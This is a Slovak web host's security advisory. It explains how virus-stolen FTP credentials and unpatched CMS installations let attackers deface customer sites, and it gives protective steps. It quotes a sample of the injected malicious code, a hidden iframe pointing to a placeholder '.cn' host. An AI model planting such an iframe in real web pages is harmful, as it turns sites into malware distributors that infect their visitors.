KonGo.sk hostuje už 1340 web stránok a 12 serverov

>< Administrácia >< Web Mail >< Web Mail 2 >< Web FTP >< ><   Webhosting kongo Webhosting skhost

Vyberte si doménu:

http://www.

Bezpečnostné upozornenia

nakoľko v posledných dňoch dochádza k častému napadnutiu a pozmeňovaniu obsahu web stránok útočnikmi, radi by sme Vás upozornili na najväčšie HROZBY:

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Zneužitie prístupu k FTP kontu

V poslednom čase sa rozmohlo zneužívanie prístupových údajov uloženych v FTP programoch - hlavne v programe Total Commander pomocou vírusov.

V súčasnosti je pomocou tohoto postupu vykonávaných až 99% úspešných útokov na web stránky.

Kedže k útokom takmer výhradne dochádza z iných krajin, prístup k FTP kontám sme implicitne povolili iba z počítačov umiesnených na Slovensku a v Českej republike. Teda z krajín odkiaľ pristupuje väčšina našich zákazníkov.

Útok zvyčajne prebieha nasledovne:

1. Vírus sa Vám nahrá do počítača napr. z napadnutej web stránky
2. prečíta vaše prístupové údaje - server, login a heslo k FTP serverom uložené v Total Commander-y
3. zašle údaje o vašich FTP kontách útočníkovi
4. útočník z rôznych počítačov napadnutých vírusom modifikuje vašu stránku - zvyčajne do nej vkladá link s vírusom (najčastejšie do súborov s názvom index a default s ľubovolnou koncovkou)
5. kod najčastejšie vyzera takto, alebo podobne: <iframe src="http://DOMENA.cn:8080/index.php" width=179 height=139 style="visibility: hidden">
6. tým pádom sa Vaša web stránka stáva šíriteľom vírusu, ktorý následne napáda návštevníkov vašej web stránky a Váš počítač je využívaný na nahrávanie vírusov na iné stránky 

ODPORÚČANÝ POSTUP:

- NIKDY SI NEUKLADAJTE HESLO K FTP KONTU V Total commander-y, ani v inom FTP programe
- začnite používať iný FTP program namiesto Total Commander-u
- odporúčame Vám používat program Filezilla, u ktorého zatial nebolo zaznamenané takéto zneužitie a je tu 
aj možnosť zapnúť šifrovaný prenos dát pomocou protokolu FTPs

Stiahnuť Filezillu môžete napr. tu:
http://www.softmania.sk/Download/Filezilla-Download.html
http://downloads.zoznam.sk/program/filezilla_26

- na všetkých počítačoch pomocou ktorých sa pripájate na FTP kontá vykonávajte pravidelne hĺbkovú kontrolu pomocou 
AntiVírusoveho a AntiSpyware programu

- ak FTP prístup nepoužívate pravideľne je vhodné ho v administrácii v časti FTP "Bezpečnostné nastavenia"
- pri podozrení na zneužitie FTP konta je možné si v administrácii v časti FTP  prezrieť "Log prihlásení"
 pre Vaše FTP konto


Viac informácií o týchto výrusoch nájdete napr. na nasledovných stránkach:

http://www.dsl.cz/clanky-dsl/clanek-1018/Nebezpecny-Total-Commander
http://tomas.blog.root.cz/2009/05/11/total-commander-a-ulozene-ftp-pristupy-opet-v-akci/
http://help.slovaknet.sk/clanok/napadena-prezentace/


------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Zneužitie neaktualizovaného open source CMS systému

Druhým najčastejsím problémom je používanie open source CMS systémov ako napr. Joomla, Drupal, Wordpress, phpBB a ďaľších, kde majiteľ web stránky nevykonáva aktualizáciu nainštalovaného CMS systému na najnovšiu verziu.

Nakoľko chyby v týchto systémoch sú pomerne často popísane verejne na internete dochádza k zneužitiu týchto chýb a tým pádom k pozmeneniu obsahu web stránku, alebo umiestneniu vírusu na takúto web stranku. 

ODPORÚČANÝ POSTUP:

- pravidelne kontrolujte aktuálnosť vášho CMS systému
- v prípade vydania novej verzie vykonajte čo najskôr aktualizáciu


------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Čo robiť v prípade napadnutia web stránky

ODPORÚČANÝ POSTUP:

- zmeňte heslo ku všetkých Vašim FTP kontám v administrácii http://admin.kongo.sk
- obnovte súbory zo zálohovacieho serveru ftp://zaloha.kongo.sk
- na všetkých počítačoch pomocou ktorých sa pripájate na FTP kontá vykonajte hĺbkovú kontrolu pomocou 
AntiVírusoveho a AntiSpyware programu
- NIKDY SI NEUKLADAJTE HESLO K FTP KONTU V Total commander-y, ani v inom FTP programe
- ak FTP prístup nepoužívate pravideľne je vhodné ho v administrácii v časti FTP "Bezpečnostné nastavenia"
- pravideľne kontrolujte v administrácii v časti FTP  "Log prihlásení" pre Vaše FTP konto